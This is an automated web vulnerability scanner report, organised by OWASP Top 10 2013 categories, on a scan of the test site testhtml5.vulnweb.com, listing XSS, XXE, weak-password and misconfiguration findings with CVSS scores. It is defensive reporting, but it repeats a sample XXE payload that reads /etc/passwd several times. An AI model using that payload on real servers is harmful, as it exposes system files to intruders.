compliance report owsap top 10 2013 - e-spin group...owasp top 10 2013 compliance report description...
TRANSCRIPT
*
OWSAP Top 10 2013 Compliance Report
OWASP TOP 10 2013
~ compliance report ~
OWASP TOP 10 2013
compliance report
Description
The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizationsabout the consequences of the most important web application security weaknesses. The Top 10 provides basictechniques to protect against these high risk problem areas - and also provides guidance on where to go from here.
Disclaimer
This document or any of its content cannot account for, or be included in any form of legal advice. The outcome of avulnerability scan (or security evaluation) should be utilized to ensure that diligent measures are taken to lower the risk ofpotential exploits carried out to compromise data. Legal advice must be supplied according to its legal context. All laws and the environments in which they are applied, areconstantly changed and revised. Therefore no information provided in this document may ever be used as an alternativeto a qualified legal body or representative. A portion of this report is taken from OWASP's Top Ten 2013 Project document, that can be found athttp://www.owasp.org.
Scan
URL
Scan date
Duration
http://testhtml5.vulnweb.com:80/
25/03/2016 7:28:40
29 minutes, 55 seconds
Profile Default
Compliance at a Glance
This section of the report is a summary and lists the number of alerts found according to individual compliancecategories.
Injection (A1) -
No alerts in this category
Broken Authentication and Session Management (A2) -
Total number of alerts in this category: 1
Cross Site Scripting (XSS) (A3) -
Total number of alerts in this category: 11
Insecure Direct Object Reference (A4) -
No alerts in this category
Security Misconfiguration (A5) -
Total number of alerts in this category: 7
Sensitive Data Exposure (A6) -
Total number of alerts in this category: 16
Missing Function Level Access Control (A7) -
Total number of alerts in this category: 3
Cross Site Request Forgery (CSRF) (A8) -
No alerts in this category
Using Components with Known Vulnerabilities (A9) -
Total number of alerts in this category: 7
UnvalidatedRedirects and Forwards (A10) -
2
No alerts in this category
3
Compliance According to Categories: A Detailed Report
This section is a detailed report that explains each vulnerability found according to individual compliance categories.
(A1) Injection
Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of acommand or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessingdata without proper authorization.
No alerts in this category.
(A2) Broken Authentication and Session Management
Application functions related to authentication and session management are often not implemented correctly, allowingattackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume otherusers' identities.
Total number of alerts in this category: 1
Alerts in this category
Basic authentication over HTTP
In the context of an HTTP transaction, basic access authentication is a method for an HTTP user agent to provide a username and password when making a request. This directory is protected using Basic Authentication over an HTTP connection. With Basic Authentication the usercredentials are sent as cleartext and because HTTPS is not used, they are vulnerable to packet sniffing.
CVSS Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CWE CWE-16
Affected item /admin/
Affected parameter
Variants 1
(A3) Cross Site Scripting (XSS)
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation orescaping. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface websites, or redirect the user to malicious sites.
Total number of alerts in this category: 11
Alerts in this category
Cross site scripting (verified)
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually inthe form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it willexecute the script in the user context allowing the attacker to access any cookies or session tokens retained by thebrowser.
4
CVSS Base Score: 6.4 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None
CVSS3 Base Score: 5.3 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: None- Integrity Impact: Low- Availability Impact: None
CWE CWE-79
Affected item /comment
Affected parameter
Variants 1
Affected item /comment
Affected parameter id
Variants 1
Affected item /like
Affected parameter
Variants 1
Affected item /like
Affected parameter id
Variants 1
Affected item /report
Affected parameter
Variants 1
Affected item /report
Affected parameter id
Variants 1
DOM-based cross site scripting
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually inthe form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it willexecute the script in the user context allowing the attacker to access any cookies or session tokens retained by thebrowser. While a traditional cross-site scripting vulnerability occurs on the server-side code, document object model basedcross-site scripting is a type of vulnerability which affects the script code in the client's browser.
CVSS Base Score: 4.4 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: None- Integrity Impact: Partial- Availability Impact: None
CVSS3 Base Score: 5.3 - Attack Vector: Network
5
- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: None- Integrity Impact: Low- Availability Impact: None
CWE CWE-79
Affected item /
Affected parameter
Variants 5
(A4) Insecure Direct Object Reference
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as afile, directory, or database key. Without an access control check or other protection, attackers can manipulate thesereferences to access unauthorized data.
No alerts in this category.
(A5) Security Misconfiguration
Good security requires having a secure configuration defined and deployed for the application, frameworks, applicationserver, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, asdefaults are often insecure. Additionally, software should be kept up to date.
Total number of alerts in this category: 7
Alerts in this category
nginx SPDY heap buffer overflow
A heap-based buffer overflow in the SPDY implementation in nginx 1.3.15 before 1.4.7 and 1.5.x before 1.5.12 allowsremote attackers to execute arbitrary code via a crafted request. The problem affects nginx compiled with thengx_http_spdy_module module (which is not compiled by default) and without --with-debug configure option, if the "spdy"option of the "listen" directive is used in a configuration file.
CVSS Base Score: 5.1 - Access Vector: Network- Access Complexity: High- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CWE CWE-122
CVE CVE-2014-0133
Affected item Web Server
Affected parameter
Variants 1
Weak password
This page is using a weak password. Acunetix WVS was able to guess the credentials required to access this page. Aweak password is short, common, a system default, or something that could be rapidly guessed by executing a bruteforce attack using a subset of all possible passwords, such as words in the dictionary, proper names, words based on theuser name or common variations on these themes.
6
CVSS Base Score: 7.5 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CVSS3 Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CWE CWE-200
Affected item /admin/
Affected parameter
Variants 2
XML external entity injection
XML supports a facility known as "external entities", which instruct an XML processor to retrieve and perform an inlineinclude of XML located at a particular URI. An external XML entity can be used to append or modify the document typedeclaration (DTD) associated with an XML document. An external XML entity can also be used to include XML within thecontent of an XML document. Now assume that the XML processor parses data originating from a source under attacker control. Most of the time theprocessor will not be validating, but it MAY include the replacement text thus initiating an unexpected file open operation,or HTTP transfer, or whatever system ids the XML processor knows how to access. below is a sample XML document that will use this functionality to include the contents of a local file (/etc/passwd) <?xml version="1.0" encoding="utf-8"?><!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "file:///etc/passwd">]><xxx>&acunetixent;</xxx>
CVSS Base Score: 6.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CVSS3 Base Score: 10 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Changed- Confidentiality Impact: High- Integrity Impact: High- Availability Impact: High
CWE CWE-611
Affected item /forgotpw
Affected parameter text/xml
Variants 1
7
Cookie without HttpOnly flag set
This cookie does not have the HTTPOnly flag set. When a cookie is set with the HTTPOnly flag, it instructs the browserthat the cookie can only be accessed by the server and not by client-side scripts. This is an important security protectionfor session cookies.
CVSS Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CWE CWE-16
Affected item /
Affected parameter
Variants 1
Insecure response with wildcard '*' in Access-Control-Allow-Origin
Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources (e.g. fonts) on a web page to berequested from another domain outside the domain from which the resource originated. The Access-Control-Allow-Originheader indicates whether a resource can be shared based by returning the value of the Origin request header, "*", or"null" in the response. If a website responds with Access-Control-Allow-Origin: * the requested resource allows sharing with every origin.Therefore, any website can make XHR (XMLHTTPRequest) requests to your site and access the responses. It's notrecommended to use the Access-Control-Allow-Origin: * header.
CVSS Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CWE CWE-16
Affected item /
Affected parameter
Variants 1
OPTIONS method is enabled
HTTP OPTIONS method is enabled on this web server. The OPTIONS method provides a list of the methods that aresupported by the web server, it represents a request for information about the communication options available on therequest/response chain identified by the Request-URI.
CVSS Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS3 Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged
8
- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CWE CWE-200
Affected item Web Server
Affected parameter
Variants 1
(A6) Sensitive Data Exposure
Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authenticationcredentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or othercrimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautionswhen exchanged with the browser.
Total number of alerts in this category: 16
Alerts in this category
nginx SPDY heap buffer overflow
A heap-based buffer overflow in the SPDY implementation in nginx 1.3.15 before 1.4.7 and 1.5.x before 1.5.12 allowsremote attackers to execute arbitrary code via a crafted request. The problem affects nginx compiled with thengx_http_spdy_module module (which is not compiled by default) and without --with-debug configure option, if the "spdy"option of the "listen" directive is used in a configuration file.
CVSS Base Score: 5.1 - Access Vector: Network- Access Complexity: High- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CWE CWE-122
CVE CVE-2014-0133
Affected item Web Server
Affected parameter
Variants 1
Weak password
This page is using a weak password. Acunetix WVS was able to guess the credentials required to access this page. Aweak password is short, common, a system default, or something that could be rapidly guessed by executing a bruteforce attack using a subset of all possible passwords, such as words in the dictionary, proper names, words based on theuser name or common variations on these themes.
CVSS Base Score: 7.5 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CVSS3 Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
9
CWE CWE-200
Affected item /admin/
Affected parameter
Variants 3
XML external entity injection
XML supports a facility known as "external entities", which instruct an XML processor to retrieve and perform an inlineinclude of XML located at a particular URI. An external XML entity can be used to append or modify the document typedeclaration (DTD) associated with an XML document. An external XML entity can also be used to include XML within thecontent of an XML document. Now assume that the XML processor parses data originating from a source under attacker control. Most of the time theprocessor will not be validating, but it MAY include the replacement text thus initiating an unexpected file open operation,or HTTP transfer, or whatever system ids the XML processor knows how to access. below is a sample XML document that will use this functionality to include the contents of a local file (/etc/passwd) <?xml version="1.0" encoding="utf-8"?><!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "file:///etc/passwd">]><xxx>&acunetixent;</xxx>
CVSS Base Score: 6.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CVSS3 Base Score: 10 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Changed- Confidentiality Impact: High- Integrity Impact: High- Availability Impact: High
CWE CWE-611
Affected item /forgotpw
Affected parameter text/xml
Variants 3
Host header attack
In many cases, developers are trusting the HTTP Host header value and using it to generate links, import scripts andeven generate password resets links with its value. This is a very bad idea, because the HTTP Host header can becontrolled by an attacker. This can be exploited using web-cache poisoning and by abusing alternative channels likepassword reset emails.
CVSS Base Score: 2.6 - Access Vector: Local- Access Complexity: High- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None
CVSS3 Base Score: 5.3 - Attack Vector: Network
10
- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: None- Integrity Impact: Low- Availability Impact: None
CWE CWE-20
Affected item /like
Affected parameter
Variants 1
Clickjacking: X-Frame-Options header missing
Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Webuser into clicking on something different from what the user perceives they are clicking on, thus potentially revealingconfidential information or taking control of their computer while clicking on seemingly innocuous web pages. The server didn't return an X-Frame-Options header which means that this website could be at risk of a clickjackingattack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowedto render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their content isnot embedded into other sites.
CVSS Base Score: 6.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CWE CWE-693
Affected item Web Server
Affected parameter
Variants 1
Cookie without HttpOnly flag set
This cookie does not have the HTTPOnly flag set. When a cookie is set with the HTTPOnly flag, it instructs the browserthat the cookie can only be accessed by the server and not by client-side scripts. This is an important security protectionfor session cookies.
CVSS Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CWE CWE-16
Affected item /
Affected parameter
Variants 1
11
Insecure response with wildcard '*' in Access-Control-Allow-Origin
Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources (e.g. fonts) on a web page to berequested from another domain outside the domain from which the resource originated. The Access-Control-Allow-Originheader indicates whether a resource can be shared based by returning the value of the Origin request header, "*", or"null" in the response. If a website responds with Access-Control-Allow-Origin: * the requested resource allows sharing with every origin.Therefore, any website can make XHR (XMLHTTPRequest) requests to your site and access the responses. It's notrecommended to use the Access-Control-Allow-Origin: * header.
CVSS Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CWE CWE-16
Affected item /
Affected parameter
Variants 1
OPTIONS method is enabled
HTTP OPTIONS method is enabled on this web server. The OPTIONS method provides a list of the methods that aresupported by the web server, it represents a request for information about the communication options available on therequest/response chain identified by the Request-URI.
CVSS Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS3 Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CWE CWE-200
Affected item Web Server
Affected parameter
Variants 1
Possible sensitive directories
A possible sensitive directory has been found. This directory is not directly linked from the website.This check looks forcommon sensitive resources like backup directories, database dumps, administration pages, temporary directories. Eachone of these directories could help an attacker to learn more about his target.
12
CVSS Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS3 Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CWE CWE-200
Affected item /admin
Affected parameter
Variants 1
Affected item /static/app/services
Affected parameter
Variants 1
Possible virtual host found
Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server(or pool of servers). This allows one server to share its resources, such as memory and processor cycles, withoutrequiring all services provided to use the same host name. This web server is responding differently when the Host header is manipulated and various common virtual hosts aretested. This could indicate there is a Virtual Host present.
CVSS Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS3 Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CWE CWE-200
Affected item localhost
Affected parameter
Variants 1
Password type input with auto-complete enabled
When a new name and password is entered in a form and the form is submitted, the browser asks if the password shouldbe saved.Thereafter when the form is displayed, the name and password are filled in automatically or are completed asthe name is entered. An attacker with local access could obtain the cleartext password from the browser cache.
13
CVSS Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CVSS3 Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CWE CWE-200
Affected item / (64adbddee16dbd3ed58373c9670b7daa)
Affected parameter
Variants 1
(A7) Missing Function Level Access Control
Most web applications verify function level access rights before making that functionality visible in the UI. However,applications need to perform the same access control checks on the server when each function is accessed. If requestsare not verified, attackers will be able to forge requests in order to access functionality without proper authorization.
Total number of alerts in this category: 3
Alerts in this category
XML external entity injection
XML supports a facility known as "external entities", which instruct an XML processor to retrieve and perform an inlineinclude of XML located at a particular URI. An external XML entity can be used to append or modify the document typedeclaration (DTD) associated with an XML document. An external XML entity can also be used to include XML within thecontent of an XML document. Now assume that the XML processor parses data originating from a source under attacker control. Most of the time theprocessor will not be validating, but it MAY include the replacement text thus initiating an unexpected file open operation,or HTTP transfer, or whatever system ids the XML processor knows how to access. below is a sample XML document that will use this functionality to include the contents of a local file (/etc/passwd) <?xml version="1.0" encoding="utf-8"?><!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "file:///etc/passwd">]><xxx>&acunetixent;</xxx>
CVSS Base Score: 6.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CVSS3 Base Score: 10 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None
14
- User Interaction: None- Scope: Changed- Confidentiality Impact: High- Integrity Impact: High- Availability Impact: High
CWE CWE-611
Affected item /forgotpw
Affected parameter text/xml
Variants 1
Host header attack
In many cases, developers are trusting the HTTP Host header value and using it to generate links, import scripts andeven generate password resets links with its value. This is a very bad idea, because the HTTP Host header can becontrolled by an attacker. This can be exploited using web-cache poisoning and by abusing alternative channels likepassword reset emails.
CVSS Base Score: 2.6 - Access Vector: Local- Access Complexity: High- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None
CVSS3 Base Score: 5.3 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: None- Integrity Impact: Low- Availability Impact: None
CWE CWE-20
Affected item /like
Affected parameter
Variants 1
Clickjacking: X-Frame-Options header missing
Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Webuser into clicking on something different from what the user perceives they are clicking on, thus potentially revealingconfidential information or taking control of their computer while clicking on seemingly innocuous web pages. The server didn't return an X-Frame-Options header which means that this website could be at risk of a clickjackingattack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowedto render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their content isnot embedded into other sites.
CVSS Base Score: 6.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CWE CWE-693
Affected item Web Server
Affected parameter
Variants 1
15
(A8) Cross Site Request Forgery (CSRF)
A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookieand any other automatically included authentication information, to a vulnerable web application. This allows the attackerto force the victim's browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
No alerts in this category.
(A9) Using Components with Known Vulnerabilities
Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If avulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications usingcomponents with known vulnerabilities may undermine application defenses and enable a range of possible attacks andimpacts.
Total number of alerts in this category: 7
Alerts in this category
nginx SPDY heap buffer overflow
A heap-based buffer overflow in the SPDY implementation in nginx 1.3.15 before 1.4.7 and 1.5.x before 1.5.12 allowsremote attackers to execute arbitrary code via a crafted request. The problem affects nginx compiled with thengx_http_spdy_module module (which is not compiled by default) and without --with-debug configure option, if the "spdy"option of the "listen" directive is used in a configuration file.
CVSS Base Score: 5.1 - Access Vector: Network- Access Complexity: High- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CWE CWE-122
CVE CVE-2014-0133
Affected item Web Server
Affected parameter
Variants 1
Weak password
This page is using a weak password. Acunetix WVS was able to guess the credentials required to access this page. Aweak password is short, common, a system default, or something that could be rapidly guessed by executing a bruteforce attack using a subset of all possible passwords, such as words in the dictionary, proper names, words based on theuser name or common variations on these themes.
CVSS Base Score: 7.5 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CVSS3 Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CWE CWE-200
16
Affected item /admin/
Affected parameter
Variants 1
XML external entity injection
XML supports a facility known as "external entities", which instruct an XML processor to retrieve and perform an inlineinclude of XML located at a particular URI. An external XML entity can be used to append or modify the document typedeclaration (DTD) associated with an XML document. An external XML entity can also be used to include XML within thecontent of an XML document. Now assume that the XML processor parses data originating from a source under attacker control. Most of the time theprocessor will not be validating, but it MAY include the replacement text thus initiating an unexpected file open operation,or HTTP transfer, or whatever system ids the XML processor knows how to access. below is a sample XML document that will use this functionality to include the contents of a local file (/etc/passwd) <?xml version="1.0" encoding="utf-8"?><!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "file:///etc/passwd">]><xxx>&acunetixent;</xxx>
CVSS Base Score: 6.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CVSS3 Base Score: 10 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Changed- Confidentiality Impact: High- Integrity Impact: High- Availability Impact: High
CWE CWE-611
Affected item /forgotpw
Affected parameter text/xml
Variants 1
Vulnerable Javascript library
You are using a vulnerable Javascript library. One or more vulnerabilities were reported for this version of the Javascriptlibrary. Consult Attack details and Web References for more information about the affected library and the vulnerabilitiesthat were reported.
CVSS Base Score: 6.4 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None
CVSS3 Base Score: 6.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None
17
- User Interaction: None- Scope: Unchanged- Confidentiality Impact: Low- Integrity Impact: Low- Availability Impact: None
CWE CWE-16
Affected item /static/app/libs/sessvars.js
Affected parameter
Variants 1
Cookie without HttpOnly flag set
This cookie does not have the HTTPOnly flag set. When a cookie is set with the HTTPOnly flag, it instructs the browserthat the cookie can only be accessed by the server and not by client-side scripts. This is an important security protectionfor session cookies.
CVSS Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CWE CWE-16
Affected item /
Affected parameter
Variants 1
Insecure response with wildcard '*' in Access-Control-Allow-Origin
Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources (e.g. fonts) on a web page to berequested from another domain outside the domain from which the resource originated. The Access-Control-Allow-Originheader indicates whether a resource can be shared based by returning the value of the Origin request header, "*", or"null" in the response. If a website responds with Access-Control-Allow-Origin: * the requested resource allows sharing with every origin.Therefore, any website can make XHR (XMLHTTPRequest) requests to your site and access the responses. It's notrecommended to use the Access-Control-Allow-Origin: * header.
CVSS Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CWE CWE-16
Affected item /
Affected parameter
Variants 1
OPTIONS method is enabled
HTTP OPTIONS method is enabled on this web server. The OPTIONS method provides a list of the methods that aresupported by the web server, it represents a request for information about the communication options available on therequest/response chain identified by the Request-URI.
18
CVSS Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS3 Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CWE CWE-200
Affected item Web Server
Affected parameter
Variants 1
(A10) UnvalidatedRedirects and Forwards
Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determinethe destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or useforwards to access unauthorized pages.
No alerts in this category.
19
Affected Items: A Detailed Report
This section provides full details of the types of vulnerabilities found according to individual affected items.
/
DOM-based cross site scripting
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually inthe form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it willexecute the script in the user context allowing the attacker to access any cookies or session tokens retained by thebrowser. While a traditional cross-site scripting vulnerability occurs on the server-side code, document object model basedcross-site scripting is a type of vulnerability which affects the script code in the client's browser.
This alert belongs to the following categories: A3
CVSS Base Score: 4.4 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: None- Integrity Impact: Partial- Availability Impact: None
CWE CWE-79
Parameter Variations
5
Cookie without HttpOnly flag set
This cookie does not have the HTTPOnly flag set. When a cookie is set with the HTTPOnly flag, it instructs the browserthat the cookie can only be accessed by the server and not by client-side scripts. This is an important security protectionfor session cookies.
This alert belongs to the following categories: A5, A6, A9
CVSS Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CWE CWE-16
Parameter Variations
1
Insecure response with wildcard '*' in Access-Control-Allow-Origin
Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources (e.g. fonts) on a web page to berequested from another domain outside the domain from which the resource originated. The Access-Control-Allow-Originheader indicates whether a resource can be shared based by returning the value of the Origin request header, "*", or"null" in the response. If a website responds with Access-Control-Allow-Origin: * the requested resource allows sharing with every origin.Therefore, any website can make XHR (XMLHTTPRequest) requests to your site and access the responses. It's notrecommended to use the Access-Control-Allow-Origin: * header.
This alert belongs to the following categories: A5, A6, A9
20
CVSS Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CWE CWE-16
Parameter Variations
1
/ (64adbddee16dbd3ed58373c9670b7daa)
Password type input with auto-complete enabled
When a new name and password is entered in a form and the form is submitted, the browser asks if the password shouldbe saved.Thereafter when the form is displayed, the name and password are filled in automatically or are completed asthe name is entered. An attacker with local access could obtain the cleartext password from the browser cache.
This alert belongs to the following categories: A6
CVSS Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CWE CWE-200
Parameter Variations
1
/admin
Possible sensitive directories
A possible sensitive directory has been found. This directory is not directly linked from the website.This check looks forcommon sensitive resources like backup directories, database dumps, administration pages, temporary directories. Eachone of these directories could help an attacker to learn more about his target.
This alert belongs to the following categories: A6
CVSS Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CWE CWE-200
Parameter Variations
1
21
/admin/
Weak password
This page is using a weak password. Acunetix WVS was able to guess the credentials required to access this page. Aweak password is short, common, a system default, or something that could be rapidly guessed by executing a bruteforce attack using a subset of all possible passwords, such as words in the dictionary, proper names, words based on theuser name or common variations on these themes.
This alert belongs to the following categories: A5, A5, A6, A6, A6, A9
CVSS Base Score: 7.5 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CWE CWE-200
Parameter Variations
1
Basic authentication over HTTP
In the context of an HTTP transaction, basic access authentication is a method for an HTTP user agent to provide a username and password when making a request. This directory is protected using Basic Authentication over an HTTP connection. With Basic Authentication the usercredentials are sent as cleartext and because HTTPS is not used, they are vulnerable to packet sniffing.
This alert belongs to the following categories: A2
CVSS Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CWE CWE-16
Parameter Variations
1
22
/comment
Cross site scripting (verified)
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually inthe form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it willexecute the script in the user context allowing the attacker to access any cookies or session tokens retained by thebrowser.
This alert belongs to the following categories: A3
CVSS Base Score: 6.4 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None
CWE CWE-79
Parameter Variations
1
id 1
/forgotpw
XML external entity injection
XML supports a facility known as "external entities", which instruct an XML processor to retrieve and perform an inlineinclude of XML located at a particular URI. An external XML entity can be used to append or modify the document typedeclaration (DTD) associated with an XML document. An external XML entity can also be used to include XML within thecontent of an XML document. Now assume that the XML processor parses data originating from a source under attacker control. Most of the time theprocessor will not be validating, but it MAY include the replacement text thus initiating an unexpected file open operation,or HTTP transfer, or whatever system ids the XML processor knows how to access. below is a sample XML document that will use this functionality to include the contents of a local file (/etc/passwd) <?xml version="1.0" encoding="utf-8"?><!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "file:///etc/passwd">]><xxx>&acunetixent;</xxx>
This alert belongs to the following categories: A5, A6, A6, A6, A7, A9
CVSS Base Score: 6.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CWE CWE-611
Parameter Variations
text/xml 1
23
